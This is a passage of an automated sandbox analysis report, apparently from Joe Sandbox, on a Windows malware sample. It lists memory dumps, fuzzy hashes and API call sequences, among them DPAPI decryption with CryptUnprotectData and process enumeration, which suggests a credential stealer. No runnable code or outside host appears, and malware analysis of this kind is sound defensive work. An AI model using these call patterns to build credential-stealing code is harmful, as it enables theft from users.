                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $,?$($+Wm$-yu$L~_
                          • API String ID: 0-3400599982
                          • Opcode ID: 3ea968a5fd356755f76789e7f64dfc3fac47d8f1f5a9239290b4c74d401ec4bc
                          • Instruction ID: 2e4248aa7515844f8632ed886fe2afa74e77242e72905cff6259b8e202cc7907
                          • Opcode Fuzzy Hash: 3ea968a5fd356755f76789e7f64dfc3fac47d8f1f5a9239290b4c74d401ec4bc
                          • Instruction Fuzzy Hash: 8FB216F3A08210AFD3046E2DDC8566AFBE9EF94720F1A493DEAC4D3744E63598418797
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007D775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D7765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007D778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007D77AD
                          • LocalFree.KERNEL32(?), ref: 007D77B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: c5eecb24346c37d069fe8c956600f1f96790976d1ed58b271a88483698daefb6
                          • Instruction ID: 6f5421b2a3bc44541c91ee974ffd229d04c5515ddb10b2291e099baf7ba69871
                          • Opcode Fuzzy Hash: c5eecb24346c37d069fe8c956600f1f96790976d1ed58b271a88483698daefb6
                          • Instruction Fuzzy Hash: DC011E75B40308BBEB10DFE49C4AFAB7B78EB44B11F104155FB09EA2C0D6B0A902CB95
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &nxx$5"6$F"{$PQwk$PQwk
                          • API String ID: 0-2218045152
                          • Opcode ID: ca6c8d61f6ee8e05552f96be0cf66b4943de13f6a52ac03d29df9365faacf86b
                          • Instruction ID: cc496224f1bd94d3d354cbbe157a9f412ca725eb41becb0cba44443c963eda69
                          • Opcode Fuzzy Hash: ca6c8d61f6ee8e05552f96be0cf66b4943de13f6a52ac03d29df9365faacf86b
                          • Instruction Fuzzy Hash: 5F524AF3A0C3049FE3046E2DDC8567AFBE9EF94720F1A863DE6C483744EA7559058686
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: x%$27}$?w?w$MhPq
                          • API String ID: 0-2013571314
                          • Opcode ID: 4a15ebde8a1bfd46928c22c24fc83e6bf5c56b46298d64eff4db20671d81ad02
                          • Instruction ID: 7daef6b90adf7451a48855bcfd5adc942cdb4cbb14db7b1132d36bdd6615b418
                          • Opcode Fuzzy Hash: 4a15ebde8a1bfd46928c22c24fc83e6bf5c56b46298d64eff4db20671d81ad02
                          • Instruction Fuzzy Hash: 1EB2F5F36082049FE3046E2DEC8567AFBE9EFD4720F16493DEAC4C3744EA3598058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !>C:$PA}{$XE{U$y:o
                          • API String ID: 0-3224491328
                          • Opcode ID: c9c4126cb64c2e483f7d2e34bff995426765ffdd29fbbd5a2e2fd55600515a24
                          • Instruction ID: 5c6e5f1ffc678a7a0463c5d6c7c8a910cf7573c41acd92a2a878c05aa6e2dbf6
                          • Opcode Fuzzy Hash: c9c4126cb64c2e483f7d2e34bff995426765ffdd29fbbd5a2e2fd55600515a24
                          • Instruction Fuzzy Hash: C482E8F36082009FE714AE2DEC8577AB7E5EFD4720F1A493DEAC4C7744EA3598018696
                          APIs
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F3A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F3AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F3ABF
                            • Part of subcall function 007F7310: lstrlen.KERNEL32(------,007D5BEB), ref: 007F731B
                            • Part of subcall function 007F7310: lstrcpy.KERNEL32(00000000), ref: 007F733F
                            • Part of subcall function 007F7310: lstrcat.KERNEL32(?,------), ref: 007F7349
                            • Part of subcall function 007F7280: lstrcpy.KERNEL32(00000000), ref: 007F72AE
                          • CloseHandle.KERNEL32(00000000), ref: 007F3BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 838517ca395f10ae16db14c12b38693632111c2bb076a84cd43607845abad129
                          • Instruction ID: f106b20fbaf1b9e1d347ba9223b2bd58e96af3f951266a4d380b063dbe50f377
                          • Opcode Fuzzy Hash: 838517ca395f10ae16db14c12b38693632111c2bb076a84cd43607845abad129
                          • Instruction Fuzzy Hash: 138104B0904209CFD754CF58C958BA5B7B1FB44325F29C2A9D5089B3B2D77A9D82CF90
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 007DEA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 007DEA7E
                          • lstrcat.KERNEL32(007FCFEC,007FCFEC), ref: 007DEB27
                          • lstrcat.KERNEL32(007FCFEC,007FCFEC), ref: 007DEB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 6e409cf9ca4e38a3d4277922bef7f3ed57e384be7d565db4a4003d0a46998ec6
                          • Instruction ID: 2c731142a569e0695d77413832d11ecff9565d19391d76b63cf9cce1cb69c138
                          • Opcode Fuzzy Hash: 6e409cf9ca4e38a3d4277922bef7f3ed57e384be7d565db4a4003d0a46998ec6
                          • Instruction Fuzzy Hash: D331E4B6A0011DABDB10DB98EC45FEFB77DDF44705F00417AFA09E6240DBB45A068BA6
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 007F40CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 007F40DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F40E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 007F4113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: f387d6c222971ca6d0d3dfb760e49bf8f288e33a349a3f7f7a5beb3e120a73e4
                          • Instruction ID: ee5024acdf6e0edd17bd00dec953555a2a7522a58c8895cf69aceaaa40b953c3
                          • Opcode Fuzzy Hash: f387d6c222971ca6d0d3dfb760e49bf8f288e33a349a3f7f7a5beb3e120a73e4
                          • Instruction Fuzzy Hash: 52015E70600209ABDB10CFA5DC45B6B7BADEF44311F108099BE48C7340DA71D952CB54
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,007FA3D0,000000FF), ref: 007F2B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 007F2B96
                          • GetLocalTime.KERNEL32(?,?,00000000,007FA3D0,000000FF), ref: 007F2BA2
                          • wsprintfA.USER32 ref: 007F2BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 852b14a28e1d194e0c4bc0ec2f04c41418cb54ae328ed410999475f2de8d3887
                          • Instruction ID: 30390a7d0d97a9785c1523d64054c20688305daa7d200783be045be561673c9b
                          • Opcode Fuzzy Hash: 852b14a28e1d194e0c4bc0ec2f04c41418cb54ae328ed410999475f2de8d3887
                          • Instruction Fuzzy Hash: 720169B2904128ABCB10DFC9DC49BBFB7BCFB4CB11F00020AFA45A2280E6784801C7B5
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007D9B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 007D9B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007D9B61
                          • LocalFree.KERNEL32 ref: 007D9B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: aca33b239b7ecf92dd1bc497d014efb382a89304a0d12e0569e3b4018ac63865
                          • Instruction ID: 80cf007dc86ad2e4d01ad508b907096d91e9882300d2fc7547d4b0641aa135bc
                          • Opcode Fuzzy Hash: aca33b239b7ecf92dd1bc497d014efb382a89304a0d12e0569e3b4018ac63865
                          • Instruction Fuzzy Hash: 96F01DB03403127BF7305F68AC49F677BA8EF04B50F210115FA45EA2D0D7B4D841CAA4
                          APIs
                          • CoCreateInstance.COMBASE(007FB110,00000000,00000001,007FB100,?), ref: 007ECB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007ECB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 007ECBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: e5fdd8d81180460781d2bab4fcde738c46660145fc5dd9831e4b6cb3be51ce1d
                          • Instruction ID: a70d0732b1c75099e55142d92eb7de269d600c9bb343ae2461720a6bf735709e
                          • Opcode Fuzzy Hash: e5fdd8d81180460781d2bab4fcde738c46660145fc5dd9831e4b6cb3be51ce1d
                          • Instruction Fuzzy Hash: 11317571A40219BFD710DB94CC82FAAB7B9DB88B10F104184FA04EB2D0D7B4AE45CB90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007D9B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007D9BB3
                          • LocalFree.KERNEL32(?), ref: 007D9BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
